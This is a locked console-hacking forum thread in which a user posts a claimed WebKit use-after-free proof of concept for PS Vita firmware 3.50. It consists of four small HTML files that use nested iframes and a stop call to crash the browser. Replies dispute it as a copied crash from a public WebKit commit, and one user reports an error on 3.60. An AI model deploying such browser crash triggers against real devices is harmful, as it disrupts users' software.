Advertising (This ad goes away for registered users. You can Login or Register)

heap use-after-free at WebCore - 3.50 POC

Underground PS4 discussions
Forum rules
Forum rule Nº 15 is strictly enforced in this subforum.
Locked
Hunter128
Posts: 1
Joined: Sat May 21, 2016 12:01 pm

heap use-after-free at WebCore - 3.50 POC

Post by Hunter128 »

Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this. Anyone hoping for advancements for the ps vite scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html

Code: Select all

<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
	    document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html

Code: Select all

<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html

Code: Select all

<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html

Code: Select all

<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :o
Advertising
rafael707
Posts: 1271
Joined: Thu Sep 30, 2010 6:10 pm
Location: VITA/PS4 section

Re: heap use-after-free at WebCore - 3.50 POC

Post by rafael707 »

Right on!

Blame qwerty for the vita scene?
Advertising
Add me, I got a ps4 ;)

IRC
#pspcommunity
#vitadev

PS4/PS VITA IGN: raff_da_don
xyz
Posts: 61
Joined: Thu Jan 20, 2011 7:06 pm

Re: heap use-after-free at WebCore - 3.50 POC

Post by xyz »

you got an exploit? or just a crash which you copied from this commit https://github.com/WebKit/webkit/commit ... e14301c704 ?
micky3936
Posts: 1
Joined: Tue Jun 07, 2016 7:31 pm

Re: heap use-after-free at WebCore - 3.50 POC

Post by micky3936 »

I get (an error has occured inthe following application. internet browser.

running vita 3.60 firmware

error code C2-12828-1
Locked

Return to “Programming and Security”